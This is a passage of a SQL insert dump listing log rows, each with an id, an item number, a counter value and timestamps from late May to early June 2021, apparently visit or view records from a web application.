18:47:21'),(23059,1544,1,'2021-05-29','2021-05-29 18:57:17'),(23060,1614,1,'2021-05-29','2021-05-29 19:17:17'),(23061,472,1,'2021-05-29','2021-05-29 19:27:08'),(23062,1600,1,'2021-05-29','2021-05-29 19:47:21'),(23063,1544,1,'2021-05-29','2021-05-29 19:57:22'),(23064,3307,1,'2021-05-29','2021-05-29 20:07:51'),(23065,1602,1,'2021-05-29','2021-05-29 20:17:29'),(23066,1592,1,'2021-05-29','2021-05-29 20:27:33'),(23067,478,1,'2021-05-29','2021-05-29 20:37:00'),(23068,570,1,'2021-05-29','2021-05-29 20:48:04'),(23069,1598,1,'2021-05-29','2021-05-29 21:18:29'),(23070,1718,1,'2021-05-29','2021-05-29 21:38:19'),(23071,3691,1,'2021-05-29','2021-05-29 22:08:22'),(23072,2769,1,'2021-05-29','2021-05-29 22:18:13'),(23073,2704,1,'2021-05-29','2021-05-29 22:38:41'),(23074,80,1,'2021-05-29','2021-05-29 23:08:39'),(23075,1594,1,'2021-05-29','2021-05-29 23:37:21'),(23076,1594,1,'2021-05-29','2021-05-29 23:37:26'),(23077,1594,1,'2021-05-29','2021-05-29 23:37:49'),(23078,1582,1,'2021-05-29','2021-05-29 23:39:11'),(23079,1594,1,'2021-05-29','2021-05-29 23:49:21'),(23080,3127,1,'2021-05-29','2021-05-29 23:59:30'),(23081,1612,1,'2021-05-30','2021-05-30 00:10:13'),(23082,1715,1,'2021-05-30','2021-05-30 00:13:48'),(23083,2309,1,'2021-05-30','2021-05-30 00:19:21'),(23084,1604,1,'2021-05-30','2021-05-30 00:29:19'),(23085,1544,1,'2021-05-30','2021-05-30 00:32:56'),(23086,89,1,'2021-05-30','2021-05-30 00:34:04'),(23087,1544,1,'2021-05-30','2021-05-30 00:35:07'),(23088,87,1,'2021-05-30','2021-05-30 00:35:57'),(23089,484,1,'2021-05-30','2021-05-30 00:36:07'),(23090,1598,1,'2021-05-30','2021-05-30 00:39:12'),(23091,91,1,'2021-05-30','2021-05-30 00:49:11'),(23092,472,1,'2021-05-30','2021-05-30 00:59:10'),(23093,2609,1,'2021-05-30','2021-05-30 01:09:10'),(23094,1715,1,'2021-05-30','2021-05-30 01:13:40'),(23095,2751,1,'2021-05-30','2021-05-30 01:19:41'),(23096,1586,1,'2021-05-30','2021-05-30 01:29:31'),(23097,1586,1,'2021-05-30','2021-05-30 01:39:21'),(23098,1728,1,'2021-05-30','2021-05-30 01:45:22'),(23099,1602,1,'2021-05-30','2021-05-30 01:47:57'),(23100,1584,1,'2021-05-30','2021-05-30 01:50:17'),(23101,2704,1,'2021-05-30','2021-05-30 01:59:30'),(23102,2248,1,'2021-05-30','2021-05-30 02:13:48'),(23103,1600,1,'2021-05-30','2021-05-30 02:50:36'),(23104,3247,1,'2021-05-30','2021-05-30 02:59:29'),(23105,2609,1,'2021-05-30','2021-05-30 03:09:40'),(23106,1602,1,'2021-05-30','2021-05-30 03:19:43'),(23107,2769,1,'2021-05-30','2021-05-30 03:29:39'),(23108,1614,1,'2021-05-30','2021-05-30 03:36:30'),(23109,1614,1,'2021-05-30','2021-05-30 03:36:34'),(23110,1614,1,'2021-05-30','2021-05-30 03:38:07'),(23111,1614,1,'2021-05-30','2021-05-30 03:39:11'),(23112,1588,1,'2021-05-30','2021-05-30 03:40:02'),(23113,477,1,'2021-05-30','2021-05-30 03:49:43'),(23114,1766,1,'2021-05-30','2021-05-30 03:49:50'),(23115,570,1,'2021-05-30','2021-05-30 03:59:42'),(23116,2457,1,'2021-05-30','2021-05-30 04:16:26'),(23117,2809,1,'2021-05-30','2021-05-30 04:19:29'),(23118,472,1,'2021-05-30','2021-05-30 04:29:40'),(23119,1600,1,'2021-05-30','2021-05-30 04:39:51'),(23120,1582,1,'2021-05-30','2021-05-30 04:49:51'),(23121,3430,1,'2021-05-30','2021-05-30 04:59:53'),(23122,3313,1,'2021-05-30','2021-05-30 05:09:58'),(23123,2751,1,'2021-05-30','2021-05-30 05:20:05'),(23124,1606,1,'2021-05-30','2021-05-30 05:30:31'),(23125,1602,1,'2021-05-30','2021-05-30 05:40:31'),(23126,570,1,'2021-05-30','2021-05-30 05:50:35'),(23127,1594,1,'2021-05-30','2021-05-30 06:00:45'),(23128,1598,1,'2021-05-30','2021-05-30 06:20:43'),(23129,1602,1,'2021-05-30','2021-05-30 06:32:09'),(23130,2309,1,'2021-05-30','2021-05-30 06:40:42'),(23131,1718,1,'2021-05-30','2021-05-30 06:50:52'),(23132,2809,1,'2021-05-30','2021-05-30 07:01:31'),(23133,1586,1,'2021-05-30','2021-05-30 07:06:34'),(23134,68,1,'2021-05-30','2021-05-30 07:10:36'),(23135,1606,1,'2021-05-30','2021-05-30 07:11:10'),(23136,1586,1,'2021-05-30','2021-05-30 07:11:26'),(23137,3107,1,'2021-05-30','2021-05-30 08:36:11'),(23138,3030,1,'2021-05-30','2021-05-30 08:42:02'),(23139,2704,1,'2021-05-30','2021-05-30 10:54:01'),(23140,2309,1,'2021-05-30','2021-05-30 11:18:23'),(23141,2457,1,'2021-05-30','2021-05-30 11:44:28'),(23142,570,1,'2021-05-30','2021-05-30 13:47:10'),(23143,570,1,'2021-05-30','2021-05-30 13:48:11'),(23144,570,1,'2021-05-30','2021-05-30 14:11:54'),(23145,1544,1,'2021-05-30','2021-05-30 14:15:29'),(23146,3079,1,'2021-05-30','2021-05-30 14:15:56'),(23147,570,1,'2021-05-30','2021-05-30 14:16:14'),(23148,2309,1,'2021-05-30','2021-05-30 14:20:36'),(23149,2704,1,'2021-05-30','2021-05-30 14:25:35'),(23150,2309,1,'2021-05-30','2021-05-30 14:44:21'),(23151,2704,1,'2021-05-30','2021-05-30 15:09:44'),(23152,3706,1,'2021-05-30','2021-05-30 15:16:58'),(23153,2457,1,'2021-05-30','2021-05-30 15:32:21'),(23154,3534,1,'2021-05-30','2021-05-30 15:46:26'),(23155,2609,1,'2021-05-30','2021-05-30 16:27:20'),(23156,2309,1,'2021-05-30','2021-05-30 16:40:25'),(23157,68,1,'2021-05-30','2021-05-30 19:06:13'),(23158,1598,1,'2021-05-30','2021-05-30 19:23:25'),(23159,91,1,'2021-05-30','2021-05-30 20:30:05'),(23160,1602,1,'2021-05-30','2021-05-30 22:41:05'),(23161,2297,1,'2021-05-30','2021-05-30 22:45:09'),(23162,1602,1,'2021-05-30','2021-05-30 23:27:31'),(23163,1602,1,'2021-05-30','2021-05-30 23:28:34'),(23164,1602,1,'2021-05-30','2021-05-30 23:38:37'),(23165,2457,1,'2021-05-31','2021-05-31 01:15:16'),(23166,2704,1,'2021-05-31','2021-05-31 02:16:33'),(23167,1582,1,'2021-05-31','2021-05-31 02:19:59'),(23168,2704,1,'2021-05-31','2021-05-31 02:23:31'),(23169,2704,1,'2021-05-31','2021-05-31 02:24:15'),(23170,1606,1,'2021-05-31','2021-05-31 02:41:06'),(23171,1544,1,'2021-05-31','2021-05-31 04:12:11'),(23172,1544,1,'2021-05-31','2021-05-31 04:23:52'),(23173,1606,1,'2021-05-31','2021-05-31 05:22:06'),(23174,68,1,'2021-05-31','2021-05-31 05:58:30'),(23175,2159,1,'2021-05-31','2021-05-31 06:55:46'),(23176,1588,1,'2021-05-31','2021-05-31 07:39:32'),(23177,1588,1,'2021-05-31','2021-05-31 07:40:55'),(23178,1588,1,'2021-05-31','2021-05-31 07:41:16'),(23179,1596,1,'2021-05-31','2021-05-31 08:22:05'),(23180,1596,1,'2021-05-31','2021-05-31 08:27:36'),(23181,1544,1,'2021-05-31','2021-05-31 08:41:22'),(23182,1612,1,'2021-05-31','2021-05-31 08:52:20'),(23183,2751,1,'2021-05-31','2021-05-31 08:53:21'),(23184,3267,1,'2021-05-31','2021-05-31 08:53:29'),(23185,2751,1,'2021-05-31','2021-05-31 08:53:35'),(23186,1600,1,'2021-05-31','2021-05-31 09:18:49'),(23187,1594,1,'2021-05-31','2021-05-31 09:30:24'),(23188,1600,1,'2021-05-31','2021-05-31 09:32:07'),(23189,1600,1,'2021-05-31','2021-05-31 09:34:36'),(23190,2751,1,'2021-05-31','2021-05-31 10:25:06'),(23191,2751,1,'2021-05-31','2021-05-31 10:25:08'),(23192,1600,1,'2021-05-31','2021-05-31 10:33:45'),(23193,1592,1,'2021-05-31','2021-05-31 10:34:31'),(23194,3287,1,'2021-05-31','2021-05-31 10:36:32'),(23195,3282,1,'2021-05-31','2021-05-31 10:36:47'),(23196,1604,1,'2021-05-31','2021-05-31 10:38:52'),(23197,1604,1,'2021-05-31','2021-05-31 10:40:24'),(23198,80,1,'2021-05-31','2021-05-31 10:45:01'),(23199,2971,1,'2021-05-31','2021-05-31 10:47:55'),(23200,91,1,'2021-05-31','2021-05-31 11:02:30'),(23201,1600,1,'2021-05-31','2021-05-31 11:25:37'),(23202,1772,1,'2021-05-31','2021-05-31 11:27:41'),(23203,2704,1,'2021-05-31','2021-05-31 11:37:43'),(23204,72,1,'2021-05-31','2021-05-31 11:38:39'),(23205,2704,1,'2021-05-31','2021-05-31 11:39:42'),(23206,80,1,'2021-05-31','2021-05-31 11:55:28'),(23207,2395,1,'2021-05-31','2021-05-31 11:55:39'),(23208,80,1,'2021-05-31','2021-05-31 11:56:12'),(23209,2309,1,'2021-05-31','2021-05-31 11:59:57'),(23210,570,1,'2021-05-31','2021-05-31 12:16:01'),(23211,2297,1,'2021-05-31','2021-05-31 12:17:44'),(23212,1594,1,'2021-05-31','2021-05-31 12:49:44'),(23213,1612,1,'2021-05-31','2021-05-31 13:02:51'),(23214,2769,1,'2021-05-31','2021-05-31 13:05:41'),(23215,1588,1,'2021-05-31','2021-05-31 14:00:09'),(23216,1588,1,'2021-05-31','2021-05-31 14:01:28'),(23217,471,1,'2021-05-31','2021-05-31 14:22:16'),(23218,467,1,'2021-05-31','2021-05-31 14:25:29'),(23219,1602,1,'2021-05-31','2021-05-31 14:36:14'),(23220,1728,1,'2021-05-31','2021-05-31 14:54:07'),(23221,1588,1,'2021-05-31','2021-05-31 15:21:26'),(23222,1588,1,'2021-05-31','2021-05-31 15:22:27'),(23223,1602,1,'2021-05-31','2021-05-31 15:26:51'),(23224,91,1,'2021-05-31','2021-05-31 15:48:02'),(23225,2609,1,'2021-05-31','2021-05-31 15:48:22'),(23226,1594,1,'2021-05-31','2021-05-31 15:49:08'),(23227,2609,1,'2021-05-31','2021-05-31 16:01:41'),(23228,1602,1,'2021-05-31','2021-05-31 16:06:39'),(23229,1718,1,'2021-05-31','2021-05-31 17:38:20'),(23230,3486,1,'2021-05-31','2021-05-31 18:31:17'),(23231,1586,1,'2021-05-31','2021-05-31 18:44:41'),(23232,2617,1,'2021-05-31','2021-05-31 18:46:03'),(23233,1720,1,'2021-05-31','2021-05-31 18:47:57'),(23234,3030,1,'2021-05-31','2021-05-31 18:47:59'),(23235,3240,1,'2021-05-31','2021-05-31 18:51:00'),(23236,2617,1,'2021-05-31','2021-05-31 18:51:50'),(23237,1586,1,'2021-05-31','2021-05-31 18:52:19'),(23238,89,1,'2021-05-31','2021-05-31 20:38:51'),(23239,1600,1,'2021-05-31','2021-05-31 20:39:19'),(23240,1592,1,'2021-05-31','2021-05-31 20:52:19'),(23241,1602,1,'2021-05-31','2021-05-31 22:08:40'),(23242,1728,1,'2021-05-31','2021-05-31 22:08:55'),(23243,68,1,'2021-05-31','2021-05-31 22:13:35'),(23244,1602,1,'2021-05-31','2021-05-31 22:14:16'),(23245,1594,1,'2021-05-31','2021-05-31 22:23:40'),(23246,1600,1,'2021-05-31','2021-05-31 23:12:00'),(23247,1600,1,'2021-05-31','2021-05-31 23:12:00'),(23248,1606,1,'2021-05-31','2021-05-31 23:18:27'),(23249,1594,1,'2021-05-31','2021-05-31 23:23:00'),(23250,2159,1,'2021-06-01','2021-06-01 00:28:47'),(23251,2309,1,'2021-06-01','2021-06-01 00:29:16'),(23252,2159,1,'2021-06-01','2021-06-01 00:30:23'),(23253,1732,1,'2021-06-01','2021-06-01 00:30:49'),(23254,2989,1,'2021-06-01','2021-06-01 00:40:17'),(23255,1586,1,'2021-06-01','2021-06-01 00:51:09'),(23256,80,1,'2021-06-01','2021-06-01 00:51:27'),(23257,1586,1,'2021-06-01','2021-06-01 01:09:36'),(23258,108,1,'2021-06-01','2021-06-01 02:01:06'),(23259,3079,1,'2021-06-01','2021-06-01 02:13:41'),(23260,1586,1,'2021-06-01','2021-06-01 02:26:14'),(23261,1586,1,'2021-06-01','2021-06-01 02:33:31'),(23262,470,1,'2021-06-01','2021-06-01 02:38:25'),(23263,2457,1,'2021-06-01','2021-06-01 03:13:33'),(23264,80,1,'2021-06-01','2021-06-01 03:37:39'),(23265,3079,1,'2021-06-01','2021-06-01 03:43:32'),(23266,2503,1,'2021-06-01','2021-06-01 05:27:12'),(23267,1602,1,'2021-06-01','2021-06-01 05:35:04'),(23268,1602,1,'2021-06-01','2021-06-01 07:21:52'),(23269,1776,1,'2021-06-01','2021-06-01 07:53:46'),(23270,1594,1,'2021-06-01','2021-06-01 08:08:18'),(23271,2457,1,'2021-06-01','2021-06-01 08:24:02'),(23272,1608,1,'2021-06-01','2021-06-01 09:38:50'),(23273,1778,1,'2021-06-01','2021-06-01 09:40:55'),(23274,1608,1,'2021-06-01','2021-06-01 09:47:12'),(23275,1594,1,'2021-06-01','2021-06-01 10:28:47'),(23276,1606,1,'2021-06-01','2021-06-01 10:36:54'),(23277,1594,1,'2021-06-01','2021-06-01 10:38:37'),(23278,2457,1,'2021-06-01','2021-06-01 10:39:01'),(23279,1600,1,'2021-06-01','2021-06-01 11:03:42'),(23280,1602,1,'2021-06-01','2021-06-01 11:37:15'),(23281,1604,1,'2021-06-01','2021-06-01 11:41:49'),(23282,1606,1,'2021-06-01','2021-06-01 11:42:18'),(23283,1600,1,'2021-06-01','2021-06-01 12:11:32'),(23284,80,1,'2021-06-01','2021-06-01 12:12:14'),(23285,80,1,'2021-06-01','2021-06-01 12:16:26'),(23286,1608,1,'2021-06-01','2021-06-01 12:20:34'),(23287,1705,1,'2021-06-01','2021-06-01 12:20:57'),(23288,1608,1,'2021-06-01','2021-06-01 12:21:56'),(23289,2178,1,'2021-06-01','2021-06-01 12:22:33'),(23290,1600,1,'2021-06-01','2021-06-01 12:27:49'),(23291,2609,1,'2021-06-01','2021-06-01 12:28:38'),(23292,1602,1,'2021-06-01','2021-06-01 12:45:05'),(23293,2769,1,'2021-06-01','2021-06-01 12:54:47'),(23294,80,1,'2021-06-01','2021-06-01 12:55:44'),(23295,68,1,'2021-06-01','2021-06-01 12:56:27'),(23296,1594,1,'2021-06-01','2021-06-01 13:20:37'),(23297,2159,1,'2021-06-01','2021-06-01 13:23:18'),(23298,1586,1,'2021-06-01','2021-06-01 13:38:26'),(23299,1586,1,'2021-06-01','2021-06-01 13:38:34'),(23300,1606,1,'2021-06-01','2021-06-01 13:43:47'),(23301,1586,1,'2021-06-01','2021-06-01 13:57:53'),(23302,2457,1,'2021-06-01','2021-06-01 14:02:12'),(23303,1608,1,'2021-06-01','2021-06-01 14:08:35'),(23304,1586,1,'2021-06-01','2021-06-01 14:21:21'),(23305,2457,1,'2021-06-01','2021-06-01 14:24:41'),(23306,2159,1,'2021-06-01','2021-06-01 14:32:19'),(23307,1588,1,'2021-06-01','2021-06-01 14:57:28'),(23308,1586,1,'2021-06-01','2021-06-01 15:20:25'),(23309,2617,1,'2021-06-01','2021-06-01 15:23:14'),(23310,1586,1,'2021-06-01','2021-06-01 15:25:33'),(23311,1586,1,'2021-06-01','2021-06-01 15:41:39'),(23312,2617,1,'2021-06-01','2021-06-01 15:41:48'),(23313,1586,1,'2021-06-01','2021-06-01 15:43:00'),(23314,1602,1,'2021-06-01','2021-06-01 15:52:59'),(23315,1586,1,'2021-06-01','2021-06-01 15:59:04'),(23316,80,1,'2021-06-01','2021-06-01 15:59:51'),(23317,1586,1,'2021-06-01','2021-06-01 16:01:29'),(23318,2309,1,'2021-06-01','2021-06-01 16:01:37'),(23319,1586,1,'2021-06-01','2021-06-01 16:13:36'),(23320,1728,1,'2021-06-01','2021-06-01 16:25:48'),(23321,80,1,'2021-06-01','2021-06-01 16:26:05'),(23322,1602,1,'2021-06-01','2021-06-01 16:28:00'),(23323,1582,1,'2021-06-01','2021-06-01 17:18:11'),(23324,2457,1,'2021-06-01','2021-06-01 17:21:13'),(23325,1776,1,'2021-06-01','2021-06-01 17:21:18'),(23326,1608,1,'2021-06-01','2021-06-01 17:21:34'),(23327,2457,1,'2021-06-01','2021-06-01 17:21:41'),(23328,1582,1,'2021-06-01','2021-06-01 17:21:43'),(23329,1602,1,'2021-06-01','2021-06-01 17:24:10'),(23330,2457,1,'2021-06-01','2021-06-01 17:30:12'),(23331,1776,1,'2021-06-01','2021-06-01 17:51:00'),(23332,80,1,'2021-06-01','2021-06-01 18:45:03'),(23333,108,1,'2021-06-01','2021-06-01 19:05:43'),(23334,1604,1,'2021-06-01','2021-06-01 19:16:03'),(23335,470,1,'2021-06-01','2021-06-01 19:24:11'),(23336,470,1,'2021-06-01','2021-06-01 19:24:26'),(23337,1544,1,'2021-06-01','2021-06-01 19:35:23'),(23338,76,1,'2021-06-01','2021-06-01 19:40:19'),(23339,1718,1,'2021-06-01','2021-06-01 20:09:13'),(23340,2309,1,'2021-06-01','2021-06-01 21:27:08'),(23341,2617,1,'2021-06-01','2021-06-01 21:31:16'),(23342,1606,1,'2021-06-01','2021-06-01 21:32:35'),(23343,2617,1,'2021-06-01','2021-06-01 21:39:38'),(23344,1596,1,'2021-06-01','2021-06-01 22:06:41'),(23345,1606,1,'2021-06-01','2021-06-01 22:26:12'),(23346,1600,1,'2021-06-01','2021-06-01 22:32:33'),(23347,1600,1,'2021-06-01','2021-06-01 22:32:34'),(23348,1715,1,'2021-06-01','2021-06-01 22:34:04'),(23349,1715,1,'2021-06-01','2021-06-01 22:34:04'),(23350,1745,1,'2021-06-01','2021-06-01 22:35:43'),(23351,1745,1,'2021-06-01','2021-06-01 22:35:44'),(23352,1724,1,'2021-06-01','2021-06-01 22:38:50'),(23353,1724,1,'2021-06-01','2021-06-01 22:38:50'),(23354,2704,1,'2021-06-01','2021-06-01 22:45:14'),(23355,72,1,'2021-06-01','2021-06-01 22:47:55'),(23356,72,1,'2021-06-01','2021-06-01 22:47:55'),(23357,72,1,'2021-06-01','2021-06-01 22:48:03'),(23358,3707,1,'2021-06-01','2021-06-01 22:49:02'),(23359,3707,1,'2021-06-01','2021-06-01 22:49:09'),(23360,3707,1,'2021-06-01','2021-06-01 22:49:09'),(23361,3706,1,'2021-06-01','2021-06-01 22:53:19'),(23362,3706,1,'2021-06-01','2021-06-01 22:53:19'),(23363,3706,1,'2021-06-01','2021-06-01 22:53:26'),(23364,3705,1,'2021-06-01','2021-06-01 22:55:16'),(23365,3705,1,'2021-06-01','2021-06-01 22:55:17'),(23366,72,1,'2021-06-01','2021-06-01 22:55:37'),(23367,68,1,'2021-06-01','2021-06-01 22:55:52'),(23368,68,1,'2021-06-01','2021-06-01 22:55:53'),(23369,2457,1,'2021-06-01','2021-06-01 23:29:34'),(23370,1582,1,'2021-06-01','2021-06-01 23:30:23'),(23371,1582,1,'2021-06-01','2021-06-01 23:30:23'),(23372,1747,1,'2021-06-01','2021-06-01 23:32:34'),(23373,1778,1,'2021-06-02','2021-06-02 00:31:47'),(23374,3006,1,'2021-06-02','2021-06-02 00:46:49'),(23375,1606,1,'2021-06-02','2021-06-02 01:09:08'),(23376,1602,1,'2021-06-02','2021-06-02 04:29:29'),(23377,1608,1,'2021-06-02','2021-06-02 06:37:38'),(23378,1604,1,'2021-06-02','2021-06-02 07:24:25'),(23379,1766,1,'2021-06-02','2021-06-02 07:28:47'),(23380,1695,1,'2021-06-02','2021-06-02 07:37:39'),(23381,2309,1,'2021-06-02','2021-06-02 08:34:56'),(23382,1544,1,'2021-06-02','2021-06-02 08:38:54'),(23383,1600,1,'2021-06-02','2021-06-02 08:44:15'),(23384,1600,1,'2021-06-02','2021-06-02 08:44:15'),(23385,2457,1,'2021-06-02','2021-06-02 08:51:15'),(23386,2457,1,'2021-06-02','2021-06-02 08:51:15'),(23387,2457,1,'2021-06-02','2021-06-02 09:06:44'),(23388,1602,1,'2021-06-02','2021-06-02 10:03:20'),(23389,1602,1,'2021-06-02','2021-06-02 11:13:47'),(23390,1600,1,'2021-06-02','2021-06-02 11:52:22'),(23391,1598,1,'2021-06-02','2021-06-02 12:16:57'),(23392,1588,1,'2021-06-02','2021-06-02 12:37:23'),(23393,2457,1,'2021-06-02','2021-06-02 12:38:19'),(23394,487,1,'2021-06-02','2021-06-02 13:41:42'),(23395,1606,1,'2021-06-02','2021-06-02 13:51:46'),(23396,108,1,'2021-06-02','2021-06-02 14:11:14'),(23397,80,1,'2021-06-02','2021-06-02 14:58:13'),(23398,80,1,'2021-06-02','2021-06-02 15:00:12'),(23399,1588,1,'2021-06-02','2021-06-02 15:05:15'),(23400,1588,1,'2021-06-02','2021-06-02 15:05:46'),(23401,108,1,'2021-06-02','2021-06-02 15:11:54'),(23402,1586,1,'2021-06-02','2021-06-02 15:17:40'),(23403,1586,1,'2021-06-02','2021-06-02 15:17:41'),(23404,1586,1,'2021-06-02','2021-06-02 15:17:47'),(23405,1586,1,'2021-06-02','2021-06-02 15:19:12'),(23406,1586,1,'2021-06-02','2021-06-02 15:19:42'),(23407,1602,1,'2021-06-02','2021-06-02 15:30:38'),(23408,1602,1,'2021-06-02','2021-06-02 15:32:44'),(23409,1606,1,'2021-06-02','2021-06-02 15:42:06'),(23410,1724,1,'2021-06-02','2021-06-02 15:43:31'),(23411,1588,1,'2021-06-02','2021-06-02 15:50:43'),(23412,1588,1,'2021-06-02','2021-06-02 15:55:04'),(23413,1726,1,'2021-06-02','2021-06-02 15:55:55'),(23414,1726,1,'2021-06-02','2021-06-02 15:56:50'),(23415,1598,1,'2021-06-02','2021-06-02 16:03:12'),(23416,1598,1,'2021-06-02','2021-06-02 16:03:18'),(23417,1602,1,'2021-06-02','2021-06-02 16:04:40'),(23418,1728,1,'2021-06-02','2021-06-02 16:04:55'),(23419,1588,1,'2021-06-02','2021-06-02 16:05:43'),(23420,1588,1,'2021-06-02','2021-06-02 16:08:53'),(23421,1586,1,'2021-06-02','2021-06-02 16:10:00'),(23422,1588,1,'2021-06-02','2021-06-02 16:10:06'),(23423,1588,1,'2021-06-02','2021-06-02 16:10:19'),(23424,1724,1,'2021-06-02','2021-06-02 16:10:56'),(23425,1588,1,'2021-06-02','2021-06-02 16:11:41'),(23426,1602,1,'2021-06-02','2021-06-02 16:39:44'),(23427,76,1,'2021-06-02','2021-06-02 16:40:32'),(23428,76,1,'2021-06-02','2021-06-02 16:41:54'),(23429,1608,1,'2021-06-02','2021-06-02 16:58:01'),(23430,1608,1,'2021-06-02','2021-06-02 17:12:57'),(23431,1594,1,'2021-06-02','2021-06-02 17:26:07'),(23432,80,1,'2021-06-02','2021-06-02 17:28:04'),(23433,1594,1,'2021-06-02','2021-06-02 17:29:27'),(23434,1586,1,'2021-06-02','2021-06-02 17:52:25'),(23435,1586,1,'2021-06-02','2021-06-02 17:52:28'),(23436,1695,1,'2021-06-02','2021-06-02 18:12:58'),(23437,3282,1,'2021-06-02','2021-06-02 18:27:58'),(23438,1544,1,'2021-06-02','2021-06-02 20:54:06'),(23439,1749,1,'2021-06-02','2021-06-02 21:25:48'),(23440,473,1,'2021-06-02','2021-06-02 21:35:02'),(23441,1544,1,'2021-06-02','2021-06-02 21:43:48'),(23442,1598,1,'2021-06-02','2021-06-02 22:00:00'),(23443,1594,1,'2021-06-02','2021-06-02 22:24:04'),(23444,1608,1,'2021-06-02','2021-06-02 22:35:42'),(23445,1608,1,'2021-06-02','2021-06-02 22:36:16'),(23446,1606,1,'2021-06-02','2021-06-02 22:44:04'),(23447,1608,1,'2021-06-02','2021-06-02 23:59:24'),(23448,1602,1,'2021-06-03','2021-06-03 00:30:30'),(23449,108,1,'2021-06-03','2021-06-03 00:39:04'),(23450,91,1,'2021-06-03','2021-06-03 00:42:37'),(23451,1606,1,'2021-06-03','2021-06-03 00:44:46'),(23452,3079,1,'2021-06-03','2021-06-03 04:55:42'),(23453,1586,1,'2021-06-03','2021-06-03 06:40:34'),(23454,1600,1,'2021-06-03','2021-06-03 06:48:08'),(23455,1600,1,'2021-06-03','2021-06-03 06:48:08'),(23456,1600,1,'2021-06-03','2021-06-03 06:48:09'),(23457,1582,1,'2021-06-03','2021-06-03 07:13:26'),(23458,1604,1,'2021-06-03','2021-06-03 07:22:42'),(23459,1582,1,'2021-06-03','2021-06-03 07:53:27'),(23460,91,1,'2021-06-03','2021-06-03 07:55:41'),(23461,1586,1,'2021-06-03','2021-06-03 08:46:03'),(23462,3265,1,'2021-06-03','2021-06-03 09:04:49'),(23463,1598,1,'2021-06-03','2021-06-03 09:32:14'),(23464,1598,1,'2021-06-03','2021-06-03 09:32:15'),(23465,2704,1,'2021-06-03','2021-06-03 09:32:54'),(23466,2704,1,'2021-06-03','2021-06-03 09:32:54'),(23467,1598,1,'2021-06-03','2021-06-03 09:34:49'),(23468,1598,1,'2021-06-03','2021-06-03 09:34:49'),(23469,1766,1,'2021-06-03','2021-06-03 09:47:50'),(23470,1600,1,'2021-06-03','2021-06-03 10:40:37'),(23471,1544,1,'2021-06-03','2021-06-03 10:57:49'),(23472,1586,1,'2021-06-03','2021-06-03 11:28:30'),(23473,1544,1,'2021-06-03','2021-06-03 11:58:25'),(23474,1749,1,'2021-06-03','2021-06-03 12:32:16'),(23475,2159,1,'2021-06-03','2021-06-03 12:56:57'),(23476,1544,1,'2021-06-03','2021-06-03 12:59:53'),(23477,2159,1,'2021-06-03','2021-06-03 13:01:36'),(23478,1586,1,'2021-06-03','2021-06-03 13:35:50'),(23479,2704,1,'2021-06-03','2021-06-03 13:57:18'),(23480,1600,1,'2021-06-03','2021-06-03 14:09:43'),(23481,3282,1,'2021-06-03','2021-06-03 14:28:11'),(23482,1598,1,'2021-06-03','2021-06-03 14:45:48'),(23483,1749,1,'2021-06-03','2021-06-03 15:15:10'),(23484,2704,1,'2021-06-03','2021-06-03 15:39:49'),(23485,1594,1,'2021-06-03','2021-06-03 15:48:05'),(23486,1594,1,'2021-06-03','2021-06-03 15:56:24'),(23487,72,1,'2021-06-03','2021-06-03 16:01:37'),(23488,1594,1,'2021-06-03','2021-06-03 16:04:41'),(23489,1606,1,'2021-06-03','2021-06-03 16:51:03'),(23490,1614,1,'2021-06-03','2021-06-03 17:03:26'),(23491,1604,1,'2021-06-03','2021-06-03 17:07:36'),(23492,2704,1,'2021-06-03','2021-06-03 17:43:22'),(23493,2704,1,'2021-06-03','2021-06-03 17:43:23'),(23494,3083,1,'2021-06-03','2021-06-03 18:20:41'),(23495,68,1,'2021-06-03','2021-06-03 18:21:06'),(23496,1749,1,'2021-06-03','2021-06-03 18:32:35'),(23497,2309,1,'2021-06-03','2021-06-03 18:36:16'),(23498,1582,1,'2021-06-03','2021-06-03 19:19:29'),(23499,2769,1,'2021-06-03','2021-06-03 19:21:23'),(23500,2769,1,'2021-06-03','2021-06-03 19:21:36'),(23501,2769,1,'2021-06-03','2021-06-03 19:21:45'),(23502,2309,1,'2021-06-03','2021-06-03 19:32:46'),(23503,2309,1,'2021-06-03','2021-06-03 19:46:48'),(23504,1544,1,'2021-06-03','2021-06-03 20:05:16'),(23505,2309,1,'2021-06-03','2021-06-03 20:15:04'),(23506,1606,1,'2021-06-03','2021-06-03 20:16:17'),(23507,1722,1,'2021-06-03','2021-06-03 21:30:23'),(23508,1722,1,'2021-06-03','2021-06-03 21:30:45'),(23509,2309,1,'2021-06-03','2021-06-03 22:49:30'),(23510,2309,1,'2021-06-03','2021-06-03 22:49:48'),(23511,2309,1,'2021-06-03','2021-06-03 22:50:04'),(23512,2309,1,'2021-06-03','2021-06-03 23:04:33'),(23513,1544,1,'2021-06-04','2021-06-04 00:20:11'),(23514,1608,1,'2021-06-04','2021-06-04 00:27:37'),(23515,1608,1,'2021-06-04','2021-06-04 00:36:24'),(23516,1592,1,'2021-06-04','2021-06-04 00:45:12'),(23517,1608,1,'2021-06-04','2021-06-04 00:48:20'),(23518,108,1,'2021-06-04','2021-06-04 00:57:33'),(23519,3107,1,'2021-06-04','2021-06-04 02:07:46'),(23520,1709,1,'2021-06-04','2021-06-04 02:15:09'),(23521,1606,1,'2021-06-04','2021-06-04 03:07:46'),(23522,3287,1,'2021-06-04','2021-06-04 04:47:13'),(23523,2159,1,'2021-06-04','2021-06-04 05:07:14'),(23524,2159,1,'2021-06-04','2021-06-04 06:20:14'),(23525,1726,1,'2021-06-04','2021-06-04 06:51:30'),(23526,1586,1,'2021-06-04','2021-06-04 07:06:05'),(23527,1774,1,'2021-06-04','2021-06-04 08:28:53'),(23528,1774,1,'2021-06-04','2021-06-04 08:30:50'),(23529,2769,1,'2021-06-04','2021-06-04 08:42:25'),(23530,1602,1,'2021-06-04','2021-06-04 09:14:42'),(23531,1718,1,'2021-06-04','2021-06-04 09:18:28'),(23532,68,1,'2021-06-04','2021-06-04 09:23:22'),(23533,1594,1,'2021-06-04','2021-06-04 10:35:14'),(23534,1604,1,'2021-06-04','2021-06-04 11:12:14'),(23535,1604,1,'2021-06-04','2021-06-04 11:12:42'),(23536,80,1,'2021-06-04','2021-06-04 11:13:27'),(23537,1766,1,'2021-06-04','2021-06-04 11:16:03'),(23538,1544,1,'2021-06-04','2021-06-04 12:21:26'),(23539,3083,1,'2021-06-04','2021-06-04 12:29:51'),(23540,3083,1,'2021-06-04','2021-06-04 12:32:02'),(23541,87,1,'2021-06-04','2021-06-04 12:53:45'),(23542,471,1,'2021-06-04','2021-06-04 12:53:56'),(23543,72,1,'2021-06-04','2021-06-04 12:59:34'),(23544,1594,1,'2021-06-04','2021-06-04 